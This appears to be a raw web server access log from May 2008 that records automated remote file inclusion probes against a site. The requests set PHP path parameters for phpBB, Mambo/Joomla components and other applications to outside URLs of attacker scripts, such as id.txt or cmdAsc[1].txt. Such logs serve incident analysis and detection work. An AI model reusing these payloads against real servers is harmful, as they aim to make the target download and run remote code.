72.34.226.62 - - [24/May/2008:12:19:21 -0700] "GET /logs//codebb/lang_select?phpbb_root_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:19:21 -0700] "GET /logs/access_080119.log//codebb/lang_select?phpbb_root_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.47.201.117 - - [24/May/2008:12:19:21 -0700] "GET /index.php?incl=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:19:24 -0700] "GET /logs/access_080213.log//codebb/lang_select?phpbb_root_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:19:24 -0700] "GET //codebb/lang_select?phpbb_root_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:19:25 -0700] "GET /logs//codebb/lang_select?phpbb_root_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:19:25 -0700] "GET /logs/access_080119.log//codebb/lang_select?phpbb_root_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.34.224.134 - - [24/May/2008:12:19:31 -0700] "GET /logs/access_080320.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.102.242.34 - - [24/May/2008:12:19:39 -0700] "GET /logs/access_080201.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://62.178.28.13/~gpw/modules/Forums/images/ranks/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [24/May/2008:12:19:51 -0700] "GET /logs/access_080121.log//skin/zero_vote/ask_password.php?dir=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.15.159.42 - - [24/May/2008:12:20:26 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://bethshemuel.com/cache/cmdAsc[1].txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.15.159.42 - - [24/May/2008:12:20:26 -0700] "GET //component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://bethshemuel.com/cache/cmdAsc[1].txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.15.159.42 - - [24/May/2008:12:20:26 -0700] "GET /logs//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://bethshemuel.com/cache/cmdAsc[1].txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:20:26 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:20:26 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:20:26 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:20:33 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:20:33 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:20:34 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:20:35 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:20:35 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:20:35 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:20:35 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:20:35 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:20:35 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:20:35 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:20:35 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:20:35 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:20:35 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:20:35 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:20:35 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:20:35 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:20:35 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:20:35 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:20:35 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:20:35 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:20:35 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.16.148.38 - - [24/May/2008:12:21:01 -0700] "GET /logs/access_080218.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://vivace.biz/spe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.16.148.38 - - [24/May/2008:12:21:03 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://vivace.biz/spe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
72.16.148.38 - - [24/May/2008:12:21:03 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://vivace.biz/spe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.16.148.38 - - [24/May/2008:12:21:11 -0700] "GET /logs/access_080218.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://vivace.biz/spe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.16.148.38 - - [24/May/2008:12:21:12 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://vivace.biz/spe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
72.16.148.38 - - [24/May/2008:12:21:16 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://vivace.biz/spe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.212.165.42 - - [24/May/2008:12:21:25 -0700] "GET /logs/access.log//modules/My_eGallery/index.php?basepath=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.165.42 - - [24/May/2008:12:21:25 -0700] "GET //modules/My_eGallery/index.php?basepath=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.165.42 - - [24/May/2008:12:21:25 -0700] "GET /logs/access.log//modules/My_eGallery/index.php?basepath=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.165.42 - - [24/May/2008:12:21:25 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.165.42 - - [24/May/2008:12:21:25 -0700] "GET //modules/My_eGallery/index.php?basepath=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.165.42 - - [24/May/2008:12:21:25 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
189.140.12.250 - - [24/May/2008:12:21:52 -0700] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.140.12.250 - - [24/May/2008:12:21:53 -0700] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.37.217.226 - - [24/May/2008:12:22:56 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.37.217.226 - - [24/May/2008:12:22:57 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:23:12 -0700] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:23:14 -0700] "GET /logs/access_080225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:23:21 -0700] "GET /logs/access_080225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:23:42 -0700] "GET /logs/access_080225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:23:46 -0700] "GET /logs/access_080225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:23:46 -0700] "GET /logs/access_080225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:23:49 -0700] "GET /logs/access_080225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:23:50 -0700] "GET /logs/access_080225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:23:50 -0700] "GET /logs/access_080225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.146.59.228 - - [24/May/2008:12:24:16 -0700] "GET /logs/access_080215.log/index.php?redir=http://www.duclaux.net/wiki/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.146.59.228 - - [24/May/2008:12:24:18 -0700] "GET /index.php?redir=http://www.duclaux.net/wiki/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
209.62.80.134 - - [24/May/2008:12:24:18 -0700] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_rune.php?phpbb_root_path=i%20fuck%20your%20mama%http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
209.62.80.134 - - [24/May/2008:12:24:18 -0700] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_rune.php?phpbb_root_path=i%20fuck%20your%20mama%http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
82.146.59.228 - - [24/May/2008:12:24:18 -0700] "GET /logs/index.php?redir=http://www.duclaux.net/wiki/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.114.130.19 - - [24/May/2008:12:24:47 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/cioabi/teid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.130.19 - - [24/May/2008:12:24:55 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/cioabi/teid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [24/May/2008:12:25:30 -0700] "GET /logs/access_071219.log//Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.blasterwb.com/publicidad/transervice_no/imagok/imagok/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [24/May/2008:12:25:30 -0700] "GET //Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.blasterwb.com/publicidad/transervice_no/imagok/imagok/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [24/May/2008:12:25:30 -0700] "GET /logs//Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.blasterwb.com/publicidad/transervice_no/imagok/imagok/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.165.42 - - [24/May/2008:12:26:15 -0700] "GET /logs/access_080201.log//modules/My_eGallery/index.php?basepath=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.138.224.8 - - [24/May/2008:12:26:17 -0700] "GET /logs/access_080116.log/protection.php?action=logout&siteurl=http://www.b470-killer.kit.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.138.224.8 - - [24/May/2008:12:26:17 -0700] "GET /logs/protection.php?action=logout&siteurl=http://www.b470-killer.kit.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [24/May/2008:12:26:24 -0700] "GET //Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.blasterwb.com/publicidad/transervice_no/imagok/imagok/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.165.42 - - [24/May/2008:12:26:31 -0700] "GET /logs/access_080201.log//modules/My_eGallery/index.php?basepath=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.236.255.134 - - [24/May/2008:12:26:33 -0700] "GET /logs/access_080207.log/config.php?path_to_root=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.236.255.134 - - [24/May/2008:12:26:33 -0700] "GET /logs/config.php?path_to_root=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.236.255.134 - - [24/May/2008:12:26:34 -0700] "GET /logs/access_080213.log/config.php?path_to_root=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
189.140.12.250 - - [24/May/2008:12:26:41 -0700] "GET /logs/access_080326.log//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [24/May/2008:12:27:08 -0700] "GET /logs/access_071219.log//Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.blasterwb.com/publicidad/transervice_no/imagok/imagok/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [24/May/2008:12:27:09 -0700] "GET //Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.blasterwb.com/publicidad/transervice_no/imagok/imagok/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [24/May/2008:12:27:09 -0700] "GET /logs//Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.blasterwb.com/publicidad/transervice_no/imagok/imagok/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.193.243 - - [24/May/2008:12:27:15 -0700] "GET /logs/access_080401.log/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:27:31 -0700] "GET /logs/access_080327.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [24/May/2008:12:27:42 -0700] "GET /logs/access_080218.log//skin/zero_vote/ask_password.php?dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:12:27:46 -0700] "GET /logs//include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:12:27:48 -0700] "GET //include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.25.195.72 - - [24/May/2008:12:27:53 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://skyoffice.com.ar/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
209.25.195.72 - - [24/May/2008:12:27:53 -0700] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://skyoffice.com.ar/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
193.111.11.7 - - [24/May/2008:12:28:03 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.59.228 - - [24/May/2008:12:28:03 -0700] "GET /logs/access_080121.log/index.php?redir=http://www.duclaux.net/wiki/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.55.53.226 - - [24/May/2008:12:28:07 -0700] "GET /logs/access_080215.log//Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.blasterwb.com/publicidad/transervice_no/imagok/imagok/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [24/May/2008:12:28:12 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [24/May/2008:12:28:19 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.255.4.13 - - [24/May/2008:12:28:35 -0700] "GET /logs/access_080221.log//core/pdf.php?config[pdf_module]=http://www.autodelen.net/beelden/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.255.4.13 - - [24/May/2008:12:28:35 -0700] "GET //core/pdf.php?config[pdf_module]=http://www.autodelen.net/beelden/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.255.4.13 - - [24/May/2008:12:28:36 -0700] "GET /logs//core/pdf.php?config[pdf_module]=http://www.autodelen.net/beelden/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [24/May/2008:12:28:49 -0700] "GET //Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.blasterwb.com/publicidad/transervice_no/imagok/imagok/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.138.224.8 - - [24/May/2008:12:28:55 -0700] "GET /main.php?appserv_root=http://www.b470-killer.kit.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.211.242 - - [24/May/2008:12:29:25 -0700] "GET /index2.php?content=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.138.224.8 - - [24/May/2008:12:29:52 -0700] "GET /logs/access_071216.log/protection.php?action=logout&siteurl=http://www.b470-killer.kit.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:12:30:28 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:12:30:36 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [24/May/2008:12:30:57 -0700] "GET /logs/access_080327.log//skin/zero_vote/ask_password.php?dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.39.235 - - [24/May/2008:12:31:16 -0700] "GET /logs/access_080331.log//ashnews.php?pathtoashnews=http://www.weber-computerdienst.de/extern/unikat-bensheim/newswriter_sw_1_3/include/ateam.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
89.255.4.13 - - [24/May/2008:12:31:22 -0700] "GET /logs/access_080313.log//core/pdf.php?config[pdf_module]=http://www.autodelen.net/beelden/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.15.159.42 - - [24/May/2008:12:31:24 -0700] "GET /logs/access.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://bethshemuel.com/cache/cmdAsc[1].txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.15.159.42 - - [24/May/2008:12:31:24 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://bethshemuel.com/cache/cmdAsc[1].txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.15.159.42 - - [24/May/2008:12:31:24 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://bethshemuel.com/cache/cmdAsc[1].txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
193.136.6.38 - - [24/May/2008:12:31:36 -0700] "GET //initiate.php?abs_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
